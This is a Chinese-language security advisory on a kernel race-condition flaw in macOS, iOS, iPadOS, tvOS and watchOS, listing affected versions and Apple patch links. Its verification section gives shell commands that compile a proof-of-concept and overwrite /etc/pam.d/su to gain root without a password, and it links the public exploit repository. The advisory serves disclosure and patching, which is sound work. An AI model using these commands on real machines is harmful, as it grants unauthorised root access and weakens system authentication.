遵纪守法
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益
漏洞描述
Apple 多个产品内核存在条件竞争漏洞,成功利用此漏洞的攻击者可使用内核权限执行任意代码。
风险等级
高危
影响版本
macOS 13.0.1 / 12.6.1(或更低版本)
tvOS < 16.2
iOS / iPadOS < 16.2
iOS / iPadOS < 15.7.2
watchOS < 9.2
漏洞验证
以macOS为例
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su
「poc」
https://github.com/zhuowei/MacDirtyCowDemo
修复方案
目前官方已发布可更新版本,建议受影响用户升级至补丁版本
https://support.apple.com/en-us/HT213531
https://support.apple.com/en-us/HT213532
https://support.apple.com/en-us/HT213530
https://support.apple.com/en-us/HT213535
https://support.apple.com/en-us/HT213536
